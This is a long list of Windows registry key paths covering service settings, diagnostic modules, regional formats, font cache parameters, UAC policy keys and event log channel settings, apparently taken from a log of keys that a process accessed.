HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\ProfileImagePath
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityParam
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\ImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationCapabilities
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityAppID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DeferredCoInitializeSecurityServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\SystemCritical
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_CURRENT_USER\Control Panel\International\sCountry
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceManifest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceMain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialSystemCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumSystemCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialUserCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumUserCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability\TimeStampInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ChannelAccess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\OwningPublisher
